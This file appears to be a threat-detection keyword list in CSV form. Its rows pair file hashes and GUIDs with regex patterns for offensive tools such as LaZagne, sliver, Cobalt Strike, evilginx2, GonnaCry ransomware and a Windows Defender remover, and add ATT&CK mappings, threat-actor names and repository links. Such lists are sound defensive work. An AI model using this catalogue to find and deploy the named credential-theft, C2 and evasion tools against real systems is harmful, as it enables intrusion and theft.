"*7C5C471B-9630-4DF5-A099-405D86553ECA*",".{0,1000}7C5C471B\-9630\-4DF5\-A099\-405D86553ECA.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","#GUIDproject","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","29602"
"*7c6036ed3f0b67af1cc73941987fbe7884789264691d05604e8a5e8b3cd9b5a1*",".{0,1000}7c6036ed3f0b67af1cc73941987fbe7884789264691d05604e8a5e8b3cd9b5a1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","29603"
"*7c60f8bb63b494964ea495a4ccdfd5a5370c2b9317f26c8bfa1d4070cc4cebe4*",".{0,1000}7c60f8bb63b494964ea495a4ccdfd5a5370c2b9317f26c8bfa1d4070cc4cebe4.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29604"
"*7C6D1CCD-D4DF-426A-B5D6-A6B5F13D0091*",".{0,1000}7C6D1CCD\-D4DF\-426A\-B5D6\-A6B5F13D0091.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","29607"
"*7c6f4b0023b62103aa803d4ddfe2736ed80f2911f7556ef16abc3be04674697b*",".{0,1000}7c6f4b0023b62103aa803d4ddfe2736ed80f2911f7556ef16abc3be04674697b.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","29608"
"*7c7803b24a7fa83c44e34499b0cc7dd9098e8d636e52c20296b0751465c3f6c3*",".{0,1000}7c7803b24a7fa83c44e34499b0cc7dd9098e8d636e52c20296b0751465c3f6c3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29611"
"*7c7b8879594486833d1c8baf05f6377ab7cb7a9b3a285ea159f25760b2d4070c*",".{0,1000}7c7b8879594486833d1c8baf05f6377ab7cb7a9b3a285ea159f25760b2d4070c.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","29612"
"*7c7f9dd4b51947a2dddd547688a493b04342058c2513e896cc70a7961cab34e7*",".{0,1000}7c7f9dd4b51947a2dddd547688a493b04342058c2513e896cc70a7961cab34e7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29613"
"*7c81d08540dd014938278a2f8edf99b75dfb677804d8806a67c1fdb70c49efd6*",".{0,1000}7c81d08540dd014938278a2f8edf99b75dfb677804d8806a67c1fdb70c49efd6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29614"
"*7c8c4d1e312218cb8a31c00d67f3b5e2e752d9e094e37c959e35e0483fc69109*",".{0,1000}7c8c4d1e312218cb8a31c00d67f3b5e2e752d9e094e37c959e35e0483fc69109.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","#filehash","N/A","6","","N/A","","","","29617"
"*7c8dcea2da2cd78b706f7e08ff49f7733008ce357fba21777d17334abf0458a6*",".{0,1000}7c8dcea2da2cd78b706f7e08ff49f7733008ce357fba21777d17334abf0458a6.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#filehash","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","29618"
"*7c8dd8b38777d6701ea54b98193216b808e2c7cb560a7cf1c07ef9e6b134dc9e*",".{0,1000}7c8dd8b38777d6701ea54b98193216b808e2c7cb560a7cf1c07ef9e6b134dc9e.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","29619"
"*7c9132c6c40c456396370d2e9cec4ee32b8cd289b29ccca946ea79f185eeaeed*",".{0,1000}7c9132c6c40c456396370d2e9cec4ee32b8cd289b29ccca946ea79f185eeaeed.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","29620"
"*7c935380a6f783ea10d0b8358d323f4238398320e1feada66ab08051be6982ed*",".{0,1000}7c935380a6f783ea10d0b8358d323f4238398320e1feada66ab08051be6982ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29621"
"*7c9a67abf328fddbc0cac8484a4f40f0c10e4b9b1cc3d4da6504df1303d7bdc0*",".{0,1000}7c9a67abf328fddbc0cac8484a4f40f0c10e4b9b1cc3d4da6504df1303d7bdc0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29622"
"*7ca893ad65bcafd58e9e676559b97af9386b184af8127e0c9531660d76ec6ed6*",".{0,1000}7ca893ad65bcafd58e9e676559b97af9386b184af8127e0c9531660d76ec6ed6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29627"
"*7cabf5918c2f097e102d28085a8171e98832c150aa10ddbcd1d05e8030f184ef*",".{0,1000}7cabf5918c2f097e102d28085a8171e98832c150aa10ddbcd1d05e8030f184ef.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#filehash","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","29628"
"*7cac4f61fe27bdb744f64ae81d3ff0611a42bb814ae589dacedb0d29c7ccdb93*",".{0,1000}7cac4f61fe27bdb744f64ae81d3ff0611a42bb814ae589dacedb0d29c7ccdb93.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","29629"
"*7cb004e20f6509f08f6e7b33778f973378c8a8e3c8cc4530cacf1f02fee3c29a*",".{0,1000}7cb004e20f6509f08f6e7b33778f973378c8a8e3c8cc4530cacf1f02fee3c29a.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","29630"
"*7cc0f7c80a3b90b1fed9a972ec241328cbc47edd1eede88bcf24933cc55c0e12*",".{0,1000}7cc0f7c80a3b90b1fed9a972ec241328cbc47edd1eede88bcf24933cc55c0e12.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","29633"
"*7cc2ba97a45b159405891baba5ac216334e89d878a4efcdf47492c284cc6342e*",".{0,1000}7cc2ba97a45b159405891baba5ac216334e89d878a4efcdf47492c284cc6342e.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","29634"
"*7cc31e4385fd3a21a506705a76c7e505730dba0bffeaeac42dc6796d8c2334d8*",".{0,1000}7cc31e4385fd3a21a506705a76c7e505730dba0bffeaeac42dc6796d8c2334d8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29635"
"*7cc7696ab1b2119884eba04da27831f698b793947b6df25a44b0064ccff20ec2*",".{0,1000}7cc7696ab1b2119884eba04da27831f698b793947b6df25a44b0064ccff20ec2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29636"
"*7cce8a658252ae3fd74663ac28d94bec3430da75a3b1c3968451dc4a82c08754*",".{0,1000}7cce8a658252ae3fd74663ac28d94bec3430da75a3b1c3968451dc4a82c08754.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29637"
"*7cd037fe5ef0d4531cb934b39570014718d2a60c01ab7a8cc74f466b6d0db417*",".{0,1000}7cd037fe5ef0d4531cb934b39570014718d2a60c01ab7a8cc74f466b6d0db417.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29638"
"*7cd4a538c3d1242ede7dcbea8dfdba84031e232e4327ed3c89292714032da91c*",".{0,1000}7cd4a538c3d1242ede7dcbea8dfdba84031e232e4327ed3c89292714032da91c.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","29639"
"*7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535*",".{0,1000}7cd720218d9cf22a1143274f4904f30bcef18bfc00ebb54de45bedfeb12d1535.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","29640"
"*7cda14dc04bb731f09880db6310c9d9d4ee96176931627f322ec725cde6bd18b*",".{0,1000}7cda14dc04bb731f09880db6310c9d9d4ee96176931627f322ec725cde6bd18b.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","29641"
"*7ce28732993dacc199e5f96517aa1d16305c86c623a0e17f9923838e3fa06133*",".{0,1000}7ce28732993dacc199e5f96517aa1d16305c86c623a0e17f9923838e3fa06133.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","29644"
"*7ce381dbed6df3b62ed0750d769effd075de2fac130236519b76c6c010729747*",".{0,1000}7ce381dbed6df3b62ed0750d769effd075de2fac130236519b76c6c010729747.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29645"
"*7ce39a5eee1a1a1929de2abead9ee1d5a4182978cf6f2e23e30e44784d2c47c0*",".{0,1000}7ce39a5eee1a1a1929de2abead9ee1d5a4182978cf6f2e23e30e44784d2c47c0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29646"
"*7ce3b3c16cdaa2dfae51fbcf163ac75947127a9fd5e2d3c588480e3629345e8f*",".{0,1000}7ce3b3c16cdaa2dfae51fbcf163ac75947127a9fd5e2d3c588480e3629345e8f.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#filehash","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","29647"
"*7ce9ff1b4f75bf4289a2f1a1c33bef9719109712019989d28c14b51703b973fc*",".{0,1000}7ce9ff1b4f75bf4289a2f1a1c33bef9719109712019989d28c14b51703b973fc.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29648"
"*7CEC7793-3E22-455B-9E88-94B8D1A8F78D*",".{0,1000}7CEC7793\-3E22\-455B\-9E88\-94B8D1A8F78D.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","#GUIDproject","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","29650"
"*7cf1f7f7e6bf8b26c5c3a6c3b1a6b0316eaea86e0b2b39dc762d510b75f4709a*",".{0,1000}7cf1f7f7e6bf8b26c5c3a6c3b1a6b0316eaea86e0b2b39dc762d510b75f4709a.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","29651"
"*7cf44a7d8433e4e8dd538377de04c249639787d7427a7beddc2236237edf2b9f*",".{0,1000}7cf44a7d8433e4e8dd538377de04c249639787d7427a7beddc2236237edf2b9f.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29652"
"*7cfb2df4376d51979916036569f38f42bb862d122b708e3531f16ecc6db08e71*",".{0,1000}7cfb2df4376d51979916036569f38f42bb862d122b708e3531f16ecc6db08e71.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","29653"
"*7CFC52.dll*",".{0,1000}7CFC52\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","29654"
"*7CFC52CD3F.dll*",".{0,1000}7CFC52CD3F\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","29655"
"*7d043db474ba220857a9290cfd11fd6c3fd42cb39e8be1b03084840bc0320d17*",".{0,1000}7d043db474ba220857a9290cfd11fd6c3fd42cb39e8be1b03084840bc0320d17.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29656"
"*7d057f377006dfa3f88af8ef1f3d90a9e28d7ce83c5854988865c7fbd62963d0*",".{0,1000}7d057f377006dfa3f88af8ef1f3d90a9e28d7ce83c5854988865c7fbd62963d0.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","29657"
"*7d1d37cb68ec4db1391f165074fed471b6a67f1948abeb26751796fad8746640*",".{0,1000}7d1d37cb68ec4db1391f165074fed471b6a67f1948abeb26751796fad8746640.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","29660"
"*7d251c4c6b137a24214a9f58a0b88f2eedad23d0d62050f36a567b78cb2ef497*",".{0,1000}7d251c4c6b137a24214a9f58a0b88f2eedad23d0d62050f36a567b78cb2ef497.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","29661"
